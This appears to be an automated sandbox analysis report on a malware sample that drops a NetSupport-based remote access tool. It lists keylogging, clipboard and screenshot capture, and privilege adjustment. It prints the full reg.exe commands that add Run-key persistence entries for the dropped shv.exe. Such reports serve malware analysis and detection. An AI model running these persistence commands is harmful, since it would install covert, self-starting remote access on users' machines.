Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://sv.symcd.com0&
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.pci.co.uk/support
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2140610512.00000229E9684000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, PCICL32.DLL.0.dr, shv.exe.0.dr, TCCTL32.DLL.0.dr, PCICHEK.DLL.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: remcmdstub.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708

Contains functionality for read data from the clipboard

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,

6_2_1101F6B0

Contains functionality to modify clipboard data

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	6_2_1101F6B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,	6_2_11032EE0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1101F6B0 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,	9_2_1101F6B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11032EE0 GetClipboardFormatNameA,SetClipboardData,	9_2_11032EE0

Contains functionality to read the clipboard data

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_110321E0 GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalFree,

6_2_110321E0

Contains functionality to record screenshots

Source: C:\Users\Public\Netstat\shv.exe

6_2_110076F0

Potential key logger detected (key state polling based)

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,		6_2_11113880
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11113880 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,		9_2_11113880

Yara detected Keylogger Generic

Source: Yara match	File source: 9.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.229e94ad820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5988, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 5552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 6488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 1936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 4000, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shv.exe PID: 3360, type: MEMORYSTR
Source: Yara match	File source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED

Spam, unwanted Advertisements and Ransom Demands

Contains functionalty to change the wallpaper

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		6_2_111158B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_111158B0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,		9_2_111158B0

Contains functionality to communicate with device drivers

Source: C:\Users\user\Desktop\file.exe

0_2_00007FF70E78C2F0

Contains functionality to launch a process as a different user

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_1115DB40 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,

6_2_1115DB40

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		6_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,		9_2_1102D330

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A1F20	0_2_00007FF70E7A1F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E785E24	0_2_00007FF70E785E24
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7ACE88	0_2_00007FF70E7ACE88
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E78F930	0_2_00007FF70E78F930
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E794928	0_2_00007FF70E794928
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B0754	0_2_00007FF70E7B0754
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E79A4AC	0_2_00007FF70E79A4AC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A3484	0_2_00007FF70E7A3484
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7AB190	0_2_00007FF70E7AB190
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E79AF18	0_2_00007FF70E79AF18
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7C2080	0_2_00007FF70E7C2080
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B0754	0_2_00007FF70E7B0754
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A8DF4	0_2_00007FF70E7A8DF4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A2D58	0_2_00007FF70E7A2D58
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A4B98	0_2_00007FF70E7A4B98
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E795B60	0_2_00007FF70E795B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E79BB90	0_2_00007FF70E79BB90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B8C1C	0_2_00007FF70E7B8C1C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7B89A0	0_2_00007FF70E7B89A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A3964	0_2_00007FF70E7A3964
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E79C96C	0_2_00007FF70E79C96C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E781AA4	0_2_00007FF70E781AA4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A2AB0	0_2_00007FF70E7A2AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7C5AF8	0_2_00007FF70E7C5AF8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E791A48	0_2_00007FF70E791A48
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7BFA94	0_2_00007FF70E7BFA94
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7BC838	0_2_00007FF70E7BC838
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E784840	0_2_00007FF70E784840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E79B534	0_2_00007FF70E79B534
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7C2550	0_2_00007FF70E7C2550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7876C0	0_2_00007FF70E7876C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A53F0	0_2_00007FF70E7A53F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E7A21D0	0_2_00007FF70E7A21D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E79F180	0_2_00007FF70E79F180
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E78C2F0	0_2_00007FF70E78C2F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E78A310	0_2_00007FF70E78A310
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E79126C	0_2_00007FF70E79126C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E787288	0_2_00007FF70E787288
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110733B0	6_2_110733B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11029590	6_2_11029590
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11061C90	6_2_11061C90
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11033010	6_2_11033010
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11163220	6_2_11163220
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1102B5F0	6_2_1102B5F0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11167485	6_2_11167485
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110454F0	6_2_110454F0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1101B760	6_2_1101B760
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_111258B0	6_2_111258B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1101BBA0	6_2_1101BBA0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11087C60	6_2_11087C60
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1116DFCB	6_2_1116DFCB
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11070090	6_2_11070090
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11080480	6_2_11080480
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1115E980	6_2_1115E980
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1101C9C0	6_2_1101C9C0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110088AB	6_2_110088AB
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11050D80	6_2_11050D80
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1CA980	6_2_6D1CA980
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1F3DB8	6_2_6D1F3DB8
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1F4910	6_2_6D1F4910
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1F3923	6_2_6D1F3923
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11061C90	9_2_11061C90
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11033010	9_2_11033010
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110733B0	9_2_110733B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11163220	9_2_11163220
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11029590	9_2_11029590
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1102B5F0	9_2_1102B5F0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11167485	9_2_11167485
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110454F0	9_2_110454F0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1101B760	9_2_1101B760
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_111258B0	9_2_111258B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1101BBA0	9_2_1101BBA0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11087C60	9_2_11087C60
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1116DFCB	9_2_1116DFCB
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11070090	9_2_11070090
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11080480	9_2_11080480
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1115E980	9_2_1115E980
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1101C9C0	9_2_1101C9C0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110088AB	9_2_110088AB
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11050D80	9_2_11050D80

Enables security privileges

Source: C:\Users\Public\Netstat\shv.exe

Process token adjusted: Security

Jump to behavior

Found potential string decryption / allocating functions

Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 110B7A20 appears 43 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 11146450 appears 1223 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 1109D8C0 appears 32 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 6D1C30A0 appears 31 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 11146EC0 appears 48 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 110278E0 appears 94 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 6D1D7D00 appears 67 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 6D1C6F50 appears 72 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 1116F010 appears 74 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 11029450 appears 2011 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 111603E3 appears 82 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 11173663 appears 40 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 1105DD10 appears 585 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 11081BB0 appears 85 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 1105DE40 appears 54 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 11164010 appears 64 times

Sample file is different than original file name gathered from version info

Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamehtctl32.dll2 vs file.exe
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenametcctl32.dll2 vs file.exe
Source: file.exe, 00000000.00000003.2140610512.00000229E9617000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepcicl32.dll2 vs file.exe

Uses reg.exe to modify the Windows registry

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"

Source: classification engine

Classification label: mal96.rans.evad.winEXE@20/13@1/2

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E78B6D8 GetLastError,FormatMessageW,LocalFree,

0_2_00007FF70E78B6D8

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	6_2_1109D440
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,	6_2_1109D4D0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	9_2_1109D440
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,	9_2_1109D4D0

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,

6_2_11115B70

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E7A8624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00007FF70E7A8624

Source: C:\Users\Public\Netstat\shv.exe

6_2_11127E10

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\Public\Netstat

Jump to behavior

Source: C:\Users\Public\Netstat\shv.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:420:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 39%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe
Source: unknown	Process created: C:\Users\Public\Netstat\shv.exe "C:\Users\Public\Netstat\shv.exe"
Source: unknown	Process created: C:\Users\Public\Netstat\shv.exe "C:\Users\Public\Netstat\shv.exe"
Source: unknown	Process created: C:\Users\Public\Netstat\shv.exe "C:\Users\Public\Netstat\shv.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
